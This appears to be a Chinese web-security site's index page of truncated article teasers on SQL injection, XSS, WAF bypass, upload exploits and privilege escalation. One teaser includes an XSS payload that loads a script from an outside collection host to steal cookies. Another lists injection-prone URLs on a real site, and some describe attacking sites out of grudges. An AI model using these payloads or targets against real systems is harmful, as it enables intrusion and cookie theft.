一次脑筋急转弯sa提权08服务器 - 网站安全 - 自学关注热度:14

目标站：www.2cto.com (代替目标站)首先说一下具体的情况 一大牛发了一个shell 挂个txt收徒、乱码了就算了 省的那大牛找我麻烦心理就想着日一下看看结果真不如人心愿 御剑开骚 哇塞 列目..[详情]

一次dedecms5.7 上传利用 - 网站安全 - 自学php关注热度:18

目标站：http://www.2cto.com (替代目标网址)日他的原因是因为BOY这么老实的一个人 居然被人刷成骗子 通过找那个人的信息看到他的名字是这站的域名很符合 所以就想都没想XXOO （因为BOY老..[详情]

waf绕过策略 - 网站安全 - 自学php关注热度:17

先说明绕过的一些方法并非原创，这里只是做下简单分析说明，另也主要起到归纳的作用网上也有绕过防注入的措施，大致内容不外乎编码之类的。这里引用几个：1，例如常见的URL编码..[详情]

人人网某功能绕过限制跨站 - 网站安全 - 自学p关注热度:19

是这么个情况，绕过人人网客户端限制的存储型XSS人人网好友支持分组管理，在创建好友分组这块，虽然在客户端做了限制，可以轻松突破1客户端的情况是有字数和特殊字符的限制：..[详情]

TaoCms SQL 注入0day - 网站安全 - 自学php关注热度:11

两张图：..[详情]

美图秀秀Andriod客户端反馈意见XSS漏洞 - 网站安全关注热度:10

美图秀秀Andriod版，在意见反馈的地址那里，填上跨站代码，即可跨~图可能有错误，代码应该写在联系方式那里#39;script src=http://xsser.me/pIQKKz/script亲爱的厂商，你把密码写在cookies里面干嘛..[详情]

灯鹭社会化评论框xss - 网站安全 - 自学php关注热度:10

一、约定词解释和说明灯鹭社会化评论框：http://www.denglu.cc/demo.html二、说明灯鹭社会化评论框在直接输入script的情况下是无效的。但目前推出允许插入图片的代码，竟然是以html模式支持..[详情]

xss插入代码和绕过过滤 - 网站安全 - 自学php关注热度:25

代码插入方式 由于插入的脚本为js或者是vbs，所有一般需要由的关键字JavaScript、VbScript、expression比 如IMG SRC=JavaScript：alert（#39;XSS#39;）；，但当接收鼠标或键盘响应时，这三个关键字..[详情]

xss漏洞之进制转换 - 网站安全 - 自学php关注热度:17

SQL注入的事件已经是上个世纪最令人头疼的攻击方法，21世纪又出现了HTML注入漏洞，随着web飞速的发展，XSS漏洞已经不容忽视，简单介绍一下XSS漏洞, 只要有用户输入的地方，就会出现..[详情]

百度知道XSS漏洞(已修复) - 网站安全 - 自学php关注热度:20

该漏洞是在傍晚时发现的，大概在晚上12点的时候被修复了事情的起因是我一同学在百度知道上看到一个很奇怪的，正文带有连接的提问（这里），正常来说，这种情况是不可能出现的。..[详情]

ECShop 2.7.3爆路径 - 网站安全 - 自学php关注热度:20

应该这个功能在发布时就没有测试，很低级的问题，出在文件/demo/ucimport.php文件差不多15行左右---------------code-----------------define(#39;ROOT_PATH#39;,str_replace(#39;\\#39;,#39;/#39;,substr.....[详情]

新浪香港某些应用，越权&sql注入&XSS - 网站关注热度:8

越权：http://cs.sina.com.hk/cgi-bin/admin/answer.cgi?id=85action=enter可对当前数据进行CRUDsql注射（这个应用注射点比较多，自己再找找）：http://misssee.sina.com.hk/cgi-bin/index.cgi?action=viewid=.....[详情]

友荐广告投入充值金额可伪造 - 网站安全 - 自学关注热度:12

友荐广告管理账户充值金额可伪造为0.01元，由于只求个乌云邀请码，so只成功到支付宝支付页面为止，至于最终会是神马情况，没带网银，就请你们去验证了http://www.ujian.cc/pay/checkout1、..[详情]

新理念外语网络教学平台文件上传及修复方案关注热度:13

信息泄露和权限不严导致列目录及上传以某大学的为例:http://www.2cto.com /NPELSNPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址setting name=Update_CommonSvr_CommonServ.....[详情]

通过QQ空间日志查找用户IP - 网站安全 - 自学php关注热度:12

通过QQ空间日志，查看用户发日志的IP地址，从日志的源文件里可以查看！得到ip:2354736842, 后面的数字2354736842是一种加密的IP。然后在CMD下ping 2354736842得到的IP是140.90.110.202。然后把IP从后..[详情]